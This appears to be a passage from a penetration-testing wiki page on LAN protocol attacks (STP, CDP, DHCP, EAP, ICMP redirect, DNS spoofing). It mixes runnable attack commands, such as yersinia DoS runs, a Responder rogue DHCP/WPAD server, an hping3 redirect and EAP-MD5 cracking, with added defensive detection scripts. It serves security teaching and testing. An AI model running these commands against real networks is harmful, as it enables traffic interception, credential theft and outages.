yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets won't be forwarded. You can use Ettercap to forward those packets: "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forward packets
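Seen from the defender's side, the yersinia root attack works by sending Configuration BPDUs that advertise a root bridge ID numerically lower than the current root's. The following Python script is an added example, not code from this page or from Yersinia: it decodes an 802.1D Configuration BPDU and flags any frame that advertises a root superior to the one the network is known to use, which is the same condition a switch's Root Guard reacts to. The bridge IDs and MAC addresses are constructed sample values.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# LLC header every 802.1D BPDU starts with: DSAP 0x42, SSAP 0x42, control 0x03 (UI)
LLC_STP = b"\x42\x42\x03"


@dataclass(frozen=True)
class BridgeId:
    """8-byte STP bridge identifier: 2-byte priority field followed by the bridge MAC."""
    priority: int
    mac: str

    @property
    def value(self) -> int:
        # STP elects the numerically lowest bridge ID as root; compare the full 64-bit value.
        return (self.priority << 48) | int(self.mac.replace(":", ""), 16)


@dataclass
class ConfigBpdu:
    root: BridgeId
    root_path_cost: int
    bridge: BridgeId
    port_id: int
    max_age: float        # seconds (wire format is 1/256 s units)
    hello_time: float
    forward_delay: float


def _bridge_id(raw: bytes) -> BridgeId:
    (prio,) = struct.unpack("!H", raw[:2])
    return BridgeId(prio, ":".join(f"{b:02x}" for b in raw[2:8]))


def parse_config_bpdu(payload: bytes) -> ConfigBpdu:
    """Decode an 802.1D Configuration BPDU (LLC header + 35-byte body)."""
    if payload[:3] != LLC_STP:
        raise ValueError("not an STP LLC frame")
    body = payload[3:]
    if len(body) < 35:
        raise ValueError("truncated BPDU")
    proto_id, _version, bpdu_type, _flags = struct.unpack("!HBBB", body[:5])
    if proto_id != 0 or bpdu_type != 0x00:
        raise ValueError(f"not a Configuration BPDU (proto {proto_id}, type 0x{bpdu_type:02x})")
    root = _bridge_id(body[5:13])
    (cost,) = struct.unpack("!I", body[13:17])
    bridge = _bridge_id(body[17:25])
    port_id, _msg_age, max_age, hello, fwd = struct.unpack("!HHHHH", body[25:35])
    return ConfigBpdu(root, cost, bridge, port_id, max_age / 256, hello / 256, fwd / 256)


def build_config_bpdu(root: BridgeId, cost: int, bridge: BridgeId, port_id: int = 0x8001) -> bytes:
    """Constructed sample BPDU used only to feed the parser above (not captured traffic)."""
    def bid(b: BridgeId) -> bytes:
        return struct.pack("!H", b.priority) + bytes.fromhex(b.mac.replace(":", ""))
    body = struct.pack("!HBBB", 0, 0, 0, 0) + bid(root) + struct.pack("!I", cost) + bid(bridge)
    # port id, message age 0, max age 20 s, hello 2 s, forward delay 15 s (802.1D defaults)
    body += struct.pack("!HHHHH", port_id, 0, 20 * 256, 2 * 256, 15 * 256)
    return LLC_STP + body


def check_root_claim(bpdu: ConfigBpdu, expected_root: BridgeId) -> Optional[str]:
    """Flag a BPDU advertising a root bridge 'better' (lower ID) than the one we expect.

    On a monitoring host this is the signature of a station trying to take over the root role.
    """
    if bpdu.root.value < expected_root.value:
        return (f"superior BPDU from {bpdu.bridge.mac}: claims root {bpdu.root.mac} "
                f"(priority {bpdu.root.priority}) but expected root is {expected_root.mac} "
                f"(priority {expected_root.priority})")
    return None


# Constructed sample topology: the legitimate root uses the default priority 32768.
LEGIT_ROOT = BridgeId(32768, "00:11:22:33:44:55")
ROGUE_BRIDGE = BridgeId(0, "02:00:00:00:00:01")   # priority 0 is the lowest value a bridge can announce

LEGIT_BPDU = build_config_bpdu(LEGIT_ROOT, 0, LEGIT_ROOT)
ROGUE_BPDU = build_config_bpdu(ROGUE_BRIDGE, 0, ROGUE_BRIDGE)

if __name__ == "__main__":
    for raw in (LEGIT_BPDU, ROGUE_BPDU):
        alert = check_root_claim(parse_config_bpdu(raw), LEGIT_ROOT)
        print(alert or "BPDU consistent with expected root")
```

On real switches the same check is enforced by Root Guard and BPDU Guard on access ports; the script is what you would run over a capture from a span port to confirm whether such a frame was ever seen.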

CDP Attacks

CISCO Discovery Protocol (CDP) is essential for communication between CISCO devices, allowing them to identify each other and share configuration details.

Passive Data Collection

CDP is configured to broadcast information through all ports, which might lead to a security risk. An attacker, upon connecting to a switch port, could deploy network sniffers like Wireshark, tcpdump, or Yersinia. This action can reveal sensitive data about the network device, including its model and the version of Cisco IOS it runs. The attacker might then target specific vulnerabilities in the identified Cisco IOS version.

Inducing CDP Table Flooding

A more aggressive approach involves launching a Denial of Service (DoS) attack by overwhelming the switch's memory, pretending to be legitimate CISCO devices. Below is the command sequence for initiating such an attack using Yersinia, a network tool designed for testing:


sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

Flooding the CDP table this way can exhaust the switch's resources and lead to what is commonly called "network paralysis".

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet
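To see concretely what the passive collection described above harvests, and what the table flooding looks like on the wire, here is an added Python example (not from this page or from Yersinia). It decodes the CDP header and its string TLVs (device ID, port ID, software version, platform) and counts distinct device IDs within an observation window, which is the simplest detection signature for a neighbour flood. Device names, version strings and the threshold are constructed or assumed values, and the CDP checksum is not verified.

```python
import struct
from typing import Dict, List, Tuple

# LLC/SNAP header carried by CDP frames: AA AA 03, Cisco OUI 00:00:0c, protocol ID 0x2000
CDP_SNAP = bytes.fromhex("aaaa03" "00000c" "2000")

# TLV types whose values matter most for an exposure review
TLV_NAMES = {0x0001: "device_id", 0x0003: "port_id", 0x0005: "software_version", 0x0006: "platform"}


def parse_cdp(payload: bytes) -> Dict[str, object]:
    """Decode the CDP header and string TLVs from a frame payload (after the Ethernet header)."""
    if not payload.startswith(CDP_SNAP):
        raise ValueError("not a CDP frame")
    body = payload[len(CDP_SNAP):]
    version, ttl, _checksum = struct.unpack("!BBH", body[:4])   # checksum is not verified here
    info: Dict[str, object] = {"version": version, "ttl": ttl}
    i = 4
    while i + 4 <= len(body):
        tlv_type, tlv_len = struct.unpack("!HH", body[i:i + 4])   # length includes the 4-byte TLV header
        if tlv_len < 4 or i + tlv_len > len(body):
            raise ValueError("malformed TLV length")
        value = body[i + 4:i + tlv_len]
        name = TLV_NAMES.get(tlv_type)
        if name:
            info[name] = value.decode("ascii", errors="replace")
        i += tlv_len
    return info


def build_cdp(device_id: str, port_id: str, software_version: str, platform: str) -> bytes:
    """Constructed sample CDP advertisement (checksum left at zero), used only to feed parse_cdp."""
    def tlv(tlv_type: int, text: str) -> bytes:
        value = text.encode("ascii")
        return struct.pack("!HH", tlv_type, len(value) + 4) + value
    header = struct.pack("!BBH", 2, 180, 0)   # CDPv2, TTL 180 s, checksum 0
    return (CDP_SNAP + header + tlv(0x0001, device_id) + tlv(0x0003, port_id)
            + tlv(0x0005, software_version) + tlv(0x0006, platform))


def neighbor_flood_check(frames: List[bytes], threshold: int) -> Tuple[int, bool]:
    """Count distinct CDP device IDs in one observation window; too many means a flood is under way.

    A real access port only ever sees one or two CDP neighbours, so a burst of fresh device IDs
    is the detection signature for the table-flooding attack described above.
    """
    seen = {str(parse_cdp(f).get("device_id")) for f in frames}
    return len(seen), len(seen) > threshold


# Constructed samples: one legitimate-looking neighbour and a burst of fake ones.
LEGIT_FRAME = build_cdp("switch-lab-1", "GigabitEthernet0/1",
                        "Cisco IOS Software (constructed sample version string)",
                        "cisco sample-platform")
FLOOD_FRAMES = [build_cdp(f"fake-{n:04d}", "Fa0/1", "v0", "fake") for n in range(60)]

if __name__ == "__main__":
    info = parse_cdp(LEGIT_FRAME)
    print("advertised:", {k: info[k] for k in ("device_id", "port_id", "software_version", "platform")})
    count, flooding = neighbor_flood_check([LEGIT_FRAME] + FLOOD_FRAMES, threshold=10)
    print(f"{count} distinct neighbours in window, flood={flooding}")
```

The software version and platform strings are exactly the fields a sniffer on an access port learns, which is why disabling CDP on user-facing ports is the usual mitigation.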

You could also use scapy; make sure to install it with the scapy/contrib package.

VoIP Attacks and the VoIP Hopper Tool

VoIP phones, increasingly integrated with IoT devices, offer functionalities like unlocking doors or controlling thermostats through special phone numbers. However, this integration can pose security risks.

The tool voiphopper is designed to emulate a VoIP phone in various environments (Cisco, Avaya, Nortel, Alcatel-Lucent). It discovers the voice network's VLAN ID using protocols like CDP, DHCP, LLDP-MED, and 802.1Q ARP.

VoIP Hopper offers three modes for the Cisco Discovery Protocol (CDP):

  1. Sniff Mode (-c 0): Analyzes network packets to identify the VLAN ID.
  2. Spoof Mode (-c 1): Generates custom packets mimicking those of an actual VoIP device.
  3. Spoof with Pre-made Packet Mode (-c 2): Sends packets identical to those of a specific Cisco IP phone model.

The preferred mode is the third one. It requires specifying the network interface (-i), the name of the VoIP device to emulate (-E) and the mode (-c 2):

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

DHCP Attacks

Enumeration

The first step in a DHCP attack is to perform enumeration to gather information about the DHCP server and the network. This information will help in planning and executing the attack.


The following tools can be used for DHCP enumeration:

  • nmap: This tool can be used to scan the network and identify active DHCP servers.
  • dhcpdump: This tool can be used to capture and analyze DHCP traffic.
  • dhcpig: This tool can be used to send DHCP requests and gather information about the DHCP server.

Once the DHCP server is identified, the next step is to gather information about the DHCP lease range, subnet mask, default gateway, DNS server, and other configuration options. This information can be obtained by analyzing the DHCP traffic or by using tools like dhcpdump or dhcpig.


It is also important to identify any rogue DHCP servers on the network. Rogue DHCP servers can be used to launch attacks like DHCP spoofing or DHCP starvation. Tools like dhcpstarv or dhcpig can be used to detect rogue DHCP servers.


By performing enumeration and gathering information about the DHCP server and the network, an attacker can gain valuable insights that can be used to plan and execute DHCP attacks.

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds
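The fields nmap prints above (server identifier, lease time, subnet mask, router, DNS server, domain name) are DHCP options carried in the OFFER. The following Python script is an added example, not code from this page or from nmap: it parses a DHCP message from its UDP payload and audits OFFER/ACK messages against an allowlist of authorized server identifiers, which is how the rogue DHCP servers mentioned above show up in a capture. The offers, the client MAC and the rogue server address 192.168.1.66 are constructed samples; the legitimate offer mirrors the nmap output.

```python
import ipaddress
import struct
from typing import Dict, List, Set

DHCP_MAGIC = b"\x63\x82\x53\x63"      # BOOTP vendor area starts with this cookie for DHCP
MSG_TYPES = {1: "DHCPDISCOVER", 2: "DHCPOFFER", 3: "DHCPREQUEST", 4: "DHCPDECLINE",
             5: "DHCPACK", 6: "DHCPNAK", 7: "DHCPRELEASE", 8: "DHCPINFORM"}


def _ip(raw: bytes) -> str:
    return str(ipaddress.IPv4Address(raw))


def _ips(raw: bytes) -> List[str]:
    return [_ip(raw[i:i + 4]) for i in range(0, len(raw) - len(raw) % 4, 4)]


def parse_dhcp(payload: bytes) -> Dict[str, object]:
    """Decode a BOOTP/DHCP message (UDP payload) into the fields nmap's script prints."""
    if len(payload) < 240 or payload[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP message")
    op, _htype, hlen, _hops, xid, _secs, _flags = struct.unpack("!BBBBIHH", payload[:12])
    options: Dict[int, bytes] = {}
    i = 240
    while i < len(payload):
        code = payload[i]
        if code == 255:            # End option
            break
        if code == 0:              # Pad option has no length byte
            i += 1
            continue
        length = payload[i + 1]
        options[code] = payload[i + 2:i + 2 + length]
        i += 2 + length
    return {
        "op": op,
        "xid": xid,
        "client_mac": ":".join(f"{b:02x}" for b in payload[28:28 + hlen]),
        "yiaddr": _ip(payload[16:20]),                      # the address being offered
        "message_type": MSG_TYPES.get(options[53][0]) if 53 in options else None,
        "server_identifier": _ip(options[54]) if 54 in options else None,
        "lease_time": struct.unpack("!I", options[51])[0] if 51 in options else None,
        "subnet_mask": _ip(options[1]) if 1 in options else None,
        "routers": _ips(options.get(3, b"")),
        "dns_servers": _ips(options.get(6, b"")),
        "domain_name": options[15].decode("ascii", errors="replace") if 15 in options else None,
    }


def build_offer(server_ip: str, offered_ip: str, client_mac: str, router: str, dns: str,
                lease: int = 60, mask: str = "255.255.255.0", domain: str = "mynet") -> bytes:
    """Constructed DHCPOFFER used only as parser input here; not captured traffic."""
    def pk(addr: str) -> bytes:
        return ipaddress.IPv4Address(addr).packed

    def opt(code: int, data: bytes) -> bytes:
        return bytes([code, len(data)]) + data

    mac = bytes.fromhex(client_mac.replace(":", ""))
    fixed = struct.pack("!BBBBIHH", 2, 1, 6, 0, 0x3903F326, 0, 0)     # op=BOOTREPLY, Ethernet, hlen 6
    fixed += bytes(4) + pk(offered_ip) + pk(server_ip) + bytes(4)    # ciaddr, yiaddr, siaddr, giaddr
    fixed += mac + bytes(16 - len(mac)) + bytes(64) + bytes(128)      # chaddr, sname, file
    opts = (opt(53, b"\x02") + opt(54, pk(server_ip)) + opt(51, struct.pack("!I", lease))
            + opt(1, pk(mask)) + opt(3, pk(router)) + opt(6, pk(dns))
            + opt(15, domain.encode("ascii")) + b"\xff")
    return fixed + DHCP_MAGIC + opts


def audit_offers(messages: List[Dict[str, object]], authorized_servers: Set[str]) -> List[str]:
    """Flag OFFER/ACK messages whose server identifier is not an authorized DHCP server."""
    alerts = []
    for m in messages:
        if m["message_type"] in ("DHCPOFFER", "DHCPACK") and m["server_identifier"] not in authorized_servers:
            alerts.append(f"rogue DHCP server {m['server_identifier']} offered {m['yiaddr']} to "
                          f"{m['client_mac']} (router {m['routers']}, dns {m['dns_servers']})")
    return alerts


# Constructed samples: the offer nmap showed above, plus a rogue offer that points the client at itself.
CLIENT_MAC = "02:00:00:00:00:aa"
LEGIT_OFFER = build_offer("192.168.1.1", "192.168.1.250", CLIENT_MAC, router="192.168.1.1", dns="192.168.1.1")
ROGUE_OFFER = build_offer("192.168.1.66", "192.168.1.200", CLIENT_MAC, router="192.168.1.66", dns="192.168.1.66")

if __name__ == "__main__":
    msgs = [parse_dhcp(LEGIT_OFFER), parse_dhcp(ROGUE_OFFER)]
    for alert in audit_offers(msgs, authorized_servers={"192.168.1.1"}):
        print(alert)
```

The allowlist check is the software equivalent of DHCP snooping on a switch, where only trusted uplink ports may carry server-side DHCP messages; running the parser over a capture also tells you immediately which router and DNS values a rogue server tried to hand out.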

DoS

Two types of DoS could be performed against DHCP servers. The first one consists of simulating enough fake hosts to use up all the possible IP addresses.
This attack will work only if you can see the responses of the DHCP server and complete the protocol (Discover (Comp) --> Offer (server) --> Request (Comp) --> ACK (server)). For example, this is not possible in Wifi networks.

Another way to perform a DHCP DoS is to send a DHCP-RELEASE packet using every possible IP as the source address. Then, the server will think that everybody has finished using the IP.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

Set malicious values

A rogue DHCP server can be set up using the DHCP script located at /usr/share/responder/DHCP.py. This is useful for network attacks, like capturing HTTP traffic and credentials, by redirecting traffic to a malicious server. However, setting a rogue gateway is less effective since it only allows capturing outbound traffic from the client, missing the responses from the real gateway. Instead, setting up a rogue DNS or WPAD server is recommended for a more effective attack.

Below are the command options for configuring the rogue DHCP server:

  • Our IP Address (Gateway Advertisement): Use -i 10.0.0.100 to advertise your machine's IP as the gateway.
  • Local DNS Domain Name: Optionally, use -d example.org to set a local DNS domain name.
  • Original Router/Gateway IP: Use -r 10.0.0.1 to specify the IP address of the legitimate router or gateway.
  • Primary DNS Server IP: Use -p 10.0.0.100 to set the IP address of the rogue DNS server you control.
  • Secondary DNS Server IP: Optionally, use -s 10.0.0.1 to set a secondary DNS server IP.
  • Netmask of Local Network: Use -n 255.255.255.0 to define the netmask for the local network.
  • Interface for DHCP Traffic: Use -I eth1 to listen for DHCP traffic on a specific network interface.
  • WPAD Configuration Address: Use -w "http://10.0.0.100/wpad.dat" to set the address for WPAD configuration, assisting in web traffic interception.
  • Spoof Default Gateway IP: Include -S to spoof the default gateway IP address.
  • Respond to All DHCP Requests: Include -R to make the server respond to all DHCP requests, but be aware that this is noisy and can be detected.

By correctly using these options, a rogue DHCP server can be established to intercept network traffic effectively.

# Example to start a rogue DHCP server with specified options
python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

EAP Attacks

Here are some of the attack tactics that can be used against 802.1X implementations:

  • Active brute-force password grinding via EAP
  • Attacking the RADIUS server with malformed EAP content (exploits)
  • EAP message capture and offline password cracking (EAP-MD5 and PEAP)
  • Forcing EAP-MD5 authentication to bypass TLS certificate validation
  • Injecting malicious network traffic upon authenticating using a hub or similar

If the attacker is between the victim and the authentication server, he could try to downgrade the authentication protocol to EAP-MD5 and capture the authentication attempt. Then, he could brute-force it using:

eapmd5pass -r pcap.dump -w /usr/share/wordlist/sqlmap.txt

FHRP (GLBP & HSRP) Attacks

FHRP (First Hop Redundancy Protocol) is a class of network protocols designed to create a hot redundant routing system. With FHRP, physical routers can be combined into a single logical device, which increases fault tolerance and helps distribute the load.

Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP.

{% content-ref url="glbp-and-hsrp-attacks.md" %} glbp-and-hsrp-attacks.md {% endcontent-ref %}

RIP

Three versions of the Routing Information Protocol (RIP) are known to exist: RIP, RIPv2, and RIPng. RIP and RIPv2 send datagrams to peers on UDP port 520, whereas RIPng sends datagrams to UDP port 521 via IPv6 multicast. Support for MD5 authentication was introduced by RIPv2. RIPng, on the other hand, has no native authentication and instead relies on the optional IPsec AH and ESP headers of IPv6.

  • RIP and RIPv2: Communication is done through UDP datagrams on port 520.
  • RIPng: Utilizes UDP port 521 for broadcasting datagrams via IPv6 multicast.

Note that RIPv2 supports MD5 authentication while RIPng does not include native authentication, relying on IPsec AH and ESP headers in IPv6.

EIGRP Attacks

EIGRP (Enhanced Interior Gateway Routing Protocol) is a dynamic, distance-vector routing protocol. If there is no authentication and no configuration of passive interfaces, an intruder can interfere with EIGRP routing and poison routing tables. Moreover, an EIGRP network (in other words, an autonomous system) is flat and has no segmentation into zones. If an attacker injects a route, it is likely that this route will spread throughout the whole EIGRP autonomous system.

Attacking an EIGRP system requires establishing a neighbourhood with a legitimate EIGRP router, which opens up a lot of possibilities, from basic reconnaissance to various injections.

FRRouting allows you to implement a virtual router that supports BGP, OSPF, EIGRP, RIP and other protocols. All you need to do is deploy it on the attacker's system and you can actually pretend to be a legitimate router in the routing domain.

{% content-ref url="eigrp-attacks.md" %} eigrp-attacks.md {% endcontent-ref %}

Coly has capabilities for intercepting EIGRP (Enhanced Interior Gateway Routing Protocol) broadcasts. It also allows for the injection of packets, which can be utilized to alter routing configurations.

OSPF

In Open Shortest Path First (OSPF) protocol MD5 authentication is commonly employed to ensure secure communication between routers. However, this security measure can be compromised using tools like Loki and John the Ripper. These tools are capable of capturing and cracking MD5 hashes, exposing the authentication key. Once this key is obtained, it can be used to introduce new routing information. To configure the route parameters and establish the compromised key, the Injection and Connection tabs are utilized, respectively.

  • Capturing and Cracking MD5 Hashes: Tools such as Loki and John the Ripper are used for this purpose.
  • Configuring Route Parameters: This is done through the Injection tab.
  • Setting the Compromised Key: The key is configured under the Connection tab.

Other Generic Tools & Sources

  • Above: Tool to scan network traffic and find vulnerabilities
  • You can find some more information about network attacks here.

Spoofing

The attacker configures all the network parameters (GW, IP, DNS) of a new member of the network by sending fake DHCP responses.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

Check the previous section.

ICMPRedirect

ICMP Redirect consists of sending an ICMP packet type 1 code 5 that indicates that the attacker is the best way to reach an IP. Then, when the victim wants to contact that IP, it will send the packets through the attacker.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] from [2], route to [3] packets sent to [4] from [5]
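
As an added example (not code from the original page), here is a small Python detector for the kind of traffic the hping3 line above generates, written from the monitoring side. On the wire, ICMP Redirect is type 5, and code 1 means "redirect datagram for the host", which is exactly what the -C 5 -K 1 flags encode. The sample packet builder, the addresses and the trusted-router set are constructed for the example; the sysctl names in the trailing comment are the real Linux knobs.

```python
import ipaddress
import struct
from typing import Optional, Set

ICMP_REDIRECT = 5  # ICMP type 5 = Redirect (hping3 -C 5)
REDIRECT_CODES = {0: "network", 1: "host", 2: "tos-network", 3: "tos-host"}  # -K 1 = host


def inet_checksum(data: bytes) -> int:
    """One's-complement checksum shared by the IPv4 and ICMP headers.
    Over a header whose checksum field is already filled in, the result is 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp_redirect(claimed_gw: str, victim: str, new_gw: str, target: str,
                        code: int = 1) -> bytes:
    """Constructed sample only: an IPv4 packet carrying an ICMP Redirect that tells
    `victim` to reach `target` via `new_gw`, apparently sent by `claimed_gw`.
    Layout per RFC 792: ICMP header, then the original IP header + 8 payload bytes."""
    def pk(addr: str) -> bytes:
        return ipaddress.IPv4Address(addr).packed

    inner = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28, 0, 0, 64, 17, 0,
                        pk(victim), pk(target)) + b"\x00" * 8
    icmp = struct.pack("!BBH4s", ICMP_REDIRECT, code, 0, pk(new_gw)) + inner
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     pk(claimed_gw), pk(victim))
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + icmp


def inspect_packet(pkt: bytes, trusted_routers: Set[str]) -> Optional[dict]:
    """Return an alert record for an ICMP Redirect, or None for any other packet.
    A redirect is suspicious when either the claimed sender or the advertised
    next hop is not one of the routers known to be legitimately on the link."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 1 or len(pkt) < ihl + 8:          # IP protocol 1 = ICMP
        return None
    icmp = pkt[ihl:]
    if icmp[0] != ICMP_REDIRECT:
        return None
    inner = icmp[8:]
    sender = str(ipaddress.IPv4Address(pkt[12:16]))
    new_gw = str(ipaddress.IPv4Address(icmp[4:8]))
    return {
        "sender": sender,
        "victim": str(ipaddress.IPv4Address(pkt[16:20])),
        "new_gateway": new_gw,
        "target": str(ipaddress.IPv4Address(inner[16:20])) if len(inner) >= 20 else None,
        "code": REDIRECT_CODES.get(icmp[1], "unknown"),
        "checksum_ok": inet_checksum(icmp) == 0,
        "suspicious": sender not in trusted_routers or new_gw not in trusted_routers,
    }


# Host-side mitigation on Linux: refuse redirects outright, or only honour ones
# that point at a gateway already present in the routing table.
#   sysctl -w net.ipv4.conf.all.accept_redirects=0
#   sysctl -w net.ipv4.conf.all.secure_redirects=1
```

Feed `inspect_packet` the raw IPv4 bytes from a capture (e.g. a pcap reader or a raw socket) and alert on records where `suspicious` is true; a legitimate redirect always comes from the current gateway and points at another router on the same link, so the allow-list is short and stable.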

DNS Spoofing

DNS Spoofing is a technique used by attackers to manipulate the Domain Name System (DNS) resolution process: the attacker intercepts and modifies DNS responses to redirect the victim's requests to a malicious server.

How DNS Spoofing Works

  1. The attacker sets up a rogue DNS server or compromises an existing DNS server.
  2. The victim's device sends a DNS query to resolve a domain name.
  3. The rogue DNS server intercepts the query and responds with a falsified DNS response.
  4. The victim's device receives the falsified response and connects to the malicious server instead of the legitimate one.

Impact of DNS Spoofing

DNS Spoofing can have various malicious consequences, including:

  • Phishing attacks: The attacker can redirect the victim to a fake website that mimics a legitimate one, tricking them into revealing sensitive information.
  • Man-in-the-middle attacks: By redirecting the victim's traffic through a malicious server, the attacker can intercept and modify the communication between the victim and the legitimate server.
  • Malware distribution: The attacker can redirect the victim to a server hosting malware, leading to the installation of malicious software on the victim's device.

Countermeasures

To mitigate the risk of DNS Spoofing, consider implementing the following countermeasures:

  • DNSSEC (DNS Security Extensions): DNSSEC adds digital signatures to DNS responses, ensuring the authenticity and integrity of the DNS data.
  • DNS monitoring: Regularly monitor DNS traffic for any suspicious activity or unexpected changes.
  • Firewall rules: Configure firewall rules to block DNS traffic from unauthorized sources.
  • DNS cache poisoning prevention: Implement measures to prevent DNS cache poisoning, such as using random transaction IDs and implementing source port randomization.

Conclusion

DNS Spoofing is a dangerous attack that can lead to various security risks. By understanding how it works and implementing appropriate countermeasures, you can better protect your network and users from this type of attack.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on
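
The last countermeasure in the list above (random transaction IDs plus source port randomization) is only useful if the resolver actually enforces it on every reply. The following Python is an added example, not code from the page, showing the accept logic a stub resolver needs: a response is taken only if its transaction ID and destination port match an outstanding query, the question section echoes what was asked, and every answer record is about the queried name; once accepted, the pending entry is consumed so a replay is rejected. The query/response builders, names and addresses are constructed for the demo.

```python
import ipaddress
import secrets
import struct
from typing import Dict, Optional, Tuple

QR = 0x8000  # "this is a response" flag in the DNS header


def encode_name(name: str) -> bytes:
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(pkt: bytes, off: int) -> Tuple[str, int]:
    """Decode a possibly-compressed name; return (name, offset just after it)."""
    labels, end, jumped = [], off, False
    while True:
        length = pkt[off]
        if length & 0xC0 == 0xC0:                   # compression pointer (RFC 1035 4.1.4)
            if not jumped:
                end = off + 2
            off, jumped = ((length & 0x3F) << 8) | pkt[off + 1], True
            continue
        off += 1
        if length == 0:
            if not jumped:
                end = off
            return ".".join(labels).lower(), end
        labels.append(pkt[off:off + length].decode("ascii"))
        off += length


def build_query(txid: int, qname: str) -> bytes:
    return (struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
            + encode_name(qname) + struct.pack("!HH", 1, 1))   # A, IN


def build_response(txid: int, qname: str, addr: str, owner: Optional[str] = None) -> bytes:
    """Constructed A-record response; `owner` lets a test forge an off-question answer."""
    hdr = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(qname) + struct.pack("!HH", 1, 1)
    owner_wire = b"\xC0\x0C" if owner is None else encode_name(owner)   # pointer to the question name
    answer = owner_wire + struct.pack("!HHIH", 1, 1, 300, 4) + ipaddress.IPv4Address(addr).packed
    return hdr + question + answer


class PendingQueries:
    """Outstanding queries keyed by (transaction ID, source port), both drawn from a
    CSPRNG, so an off-path forger has to guess roughly 32 bits per attempt."""

    def __init__(self) -> None:
        self.pending: Dict[Tuple[int, int], str] = {}

    def send(self, qname: str) -> Tuple[int, int, bytes]:
        txid = secrets.randbelow(1 << 16)
        sport = 1024 + secrets.randbelow(65536 - 1024)
        self.pending[(txid, sport)] = qname.lower()
        return txid, sport, build_query(txid, qname)

    def accept(self, dst_port: int, resp: bytes) -> bool:
        """True only if resp matches a pending query in ID, port, question and answer owners."""
        if len(resp) < 12:
            return False
        txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", resp[:12])
        expected = self.pending.get((txid, dst_port))
        if expected is None or not flags & QR or qd != 1:
            return False
        qname, off = decode_name(resp, 12)
        if qname != expected:
            return False
        off += 4                                    # skip QTYPE/QCLASS
        for _ in range(an):                         # every answer must be about the question
            owner, off = decode_name(resp, off)
            _, _, _, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
            off += 10 + rdlen
            if owner != qname:
                return False
        del self.pending[(txid, dst_port)]          # consume: a replayed reply is rejected
        return True
```

The owner-name check is the part most home-grown resolvers skip: a forged reply with the right ID and port can still carry an extra record for a name you never asked about, and without that check it lands in the cache.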

Configure own DNS with dnsmasq

apt-get install dnsmasq
echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.conf
echo "127.0.0.1   domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the DNS
sudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Local Gateways

Multiple routes to systems and networks often exist. Upon building a list of MAC addresses within the local network, use gateway-finder.py to identify hosts that support IPv4 forwarding.

root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.0.100     00:13:72:09:ad:76       Dell Inc.
10.0.0.200     00:90:27:43:c0:57       INTEL CORPORATION
10.0.0.254     00:08:74:c0:40:ce       Dell Computer Corp.

root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]

Spoofing LLMNR, NBT-NS, and mDNS

